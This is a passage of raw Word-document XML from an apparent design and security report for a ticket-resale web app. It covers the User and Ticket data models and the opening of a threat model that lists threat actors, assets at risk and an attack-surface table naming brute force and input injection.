          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name (String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B75C5C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>email (String, unique)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5EF808" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">password (hashed with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E371B" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>googleId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for OAuth users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A05472" w14:textId="26E8D100" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB80B90" w14:textId="23CB9F48" w:rsidR="00FC5B42" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Ticket Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34966206" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File: /server/models/Ticket.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B3D06" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A0D589" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>title, description, price, category, city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2CD81D" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seller (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ObjectId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ref: User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BA73A" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sanitized strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6539BF74" w14:textId="42C5F0EB" w:rsidR="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>createdAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>updatedAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03A91527" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This schema design supports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D3C4F" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>multi-user ticket listings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F4C96" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9EAAA3" w14:textId="5629A7E2" w:rsidR="00FC5B42" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referencing seller account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347386B9" w14:textId="3DB947C9" w:rsidR="00FC5B42" w:rsidRDefault="00FC5B42" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc214584801"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Threat Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D85EC1" w14:textId="3EB84A5A" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This section covers the full threat model with corresponding vulnerabilities, risks, and mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1494740D" w14:textId="5BF7663D" w:rsidR="00FC5B42" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc214584802"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Threat Actors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="11671CD9" w14:textId="3EAD278C" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Malicious buyers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA6C1A" w14:textId="13D2EF71" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Automated bot attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1EEEB" w14:textId="1E3883C4" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Script kiddies testing common payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257A687" w14:textId="7923B524" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Users attempting privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B9980" w14:textId="69E91618" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>External attackers scanning for vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4912B" w14:textId="238A931A" w:rsidR="00FC5B42" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc214584803"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Assets At Risk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="19282AD6" w14:textId="7D2E124A" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>User accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35000D37" w14:textId="5BEDD3A0" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Tokens (JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E07B6AB" w14:textId="1A977745" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Ticket listings (user-generated content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7A718" w14:textId="44C9F23B" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Server resources (DoS threats)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD22FE9" w14:textId="3E96E4E0" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Google OAuth flows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A0640" w14:textId="7EA3FD3E" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Sensitive user actions (password change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32B44F" w14:textId="77777777" w:rsidR="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc214584804"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack Surface</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>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3508"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="4B5A2934" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CBD20A8" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E9A9530" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Attack Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="0CD3B8AD" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CEB96C4"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Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5503C61A"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brute force, credential stuffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="2A2B44D9" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31608789"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Signup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F3C5F92"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malicious input injection</w:t>
            </w:r>
